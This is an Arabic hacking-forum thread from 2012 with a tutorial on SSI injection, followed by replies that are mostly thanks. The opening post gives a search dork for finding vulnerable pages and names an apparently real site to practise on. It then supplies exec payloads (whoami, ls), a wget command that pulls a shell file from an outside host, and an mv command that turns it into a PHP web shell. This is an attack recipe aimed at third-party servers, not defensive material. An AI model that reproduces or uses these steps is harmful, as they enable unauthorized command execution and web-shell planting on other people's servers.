يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-29-2012, 09:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي قنبلة : شرح ثغرات من نوع ssi Injection


السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

كود PHP:
<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory 
هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

كود PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 
نشوف





تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

كود PHP:
<!--#exec cmd="wget http://website.com/dir/shell.txt" --> 


خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

كود PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 


تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

كود PHP:
<!--#exec cmd="mv shell.txt shell.php" --> 
ونتاكد الان



استعرض



اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي







rkfgm : avp eyvhj lk k,u ssi Injection

   

رد مع اقتباس
قديم 10-29-2012, 11:51 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


تم التقييم ياغالى
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس
قديم 10-29-2012, 05:10 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bscbsc
 

 

 
إحصائية العضو





bscbsc غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
bscbsc is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


يعطيك العآفيه اخوي

   

رد مع اقتباس
قديم 10-29-2012, 09:09 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


موضوع قوي و رائع ، بارك الله فيك يا أخي الكريم و جزاك الله عنا كل خير

   

رد مع اقتباس
قديم 10-30-2012, 02:53 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
Dr.Bat
$ Spam King ~
 
الصورة الرمزية Dr.Bat
 

 

 
إحصائية العضو






Dr.Bat غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Bat is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


وحش ياغالي واصل الي لامام

التوقيع

R.H@hotmail.com

للتواصل مو ......

 

   

رد مع اقتباس
قديم 10-30-2012, 03:34 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


جربت هالثغره من قبل على كم موقع , وفعلا ماقريت من قبل شخصياً موقع عربي شارح عنها شيء,
ملاحضة بسيطه ssi اختصار ل "server side include" وعادتا بالاصح الثغره بنستغلها في حال كان صيغة الصفحة (.shtml) وبنقدر ننفذ اوامر كانها remote code execution مثل ماموضح فوق.

واصل اخ حمد وإلى الأمام .

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 11-03-2012, 11:03 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية abdoog
 

 

 
إحصائية العضو





abdoog غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdoog is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


مشكوووور عالشرح وبارك الله فيك

التوقيع


=============================
هما طريقان


http://im29.gulfup.com/WRLb10.jpg



=============================






 

   

رد مع اقتباس
قديم 11-04-2012, 11:01 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية sami hack
 

 

 
إحصائية العضو






sami hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
sami hack is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


مشكوووور يالغلا ع الشرح وواصل تألقك

   

رد مع اقتباس
قديم 11-06-2012, 09:37 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية hitsKy
 

 

 
إحصائية العضو





hitsKy غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitsKy is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


مشكووووووووووور

   

رد مع اقتباس
قديم 11-13-2012, 03:32 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


منورين حبايب قلبي ..

   

رد مع اقتباس
قديم 11-14-2012, 01:29 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية sH3LL
 

 

 
إحصائية العضو






sH3LL غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
sH3LL is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


lبارك الله فيك على الشرح

   

رد مع اقتباس
قديم 11-16-2012, 12:51 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية Mr,Talal
 

 

 
إحصائية العضو





Mr,Talal غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr,Talal is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


:موضوع اكثر من رائع

   

رد مع اقتباس
قديم 11-20-2012, 04:39 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية SaMI-php
 

 

 
إحصائية العضو





SaMI-php غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
SaMI-php is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


جاري المتايعه

   

رد مع اقتباس
قديم 11-20-2012, 04:49 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية inshtaine
 

 

 
إحصائية العضو






inshtaine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
inshtaine is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


اخي موضوع جميل
تم التقييم ياغالى

   

رد مع اقتباس
قديم 11-21-2012, 12:20 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية essalhi saw
 

 

 
إحصائية العضو






essalhi saw غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
essalhi saw is on a distinguished road

افتراضي رد: قنبلة : شرح ثغرات من نوع ssi Injection


goooooooooooooooood

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 09:20 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0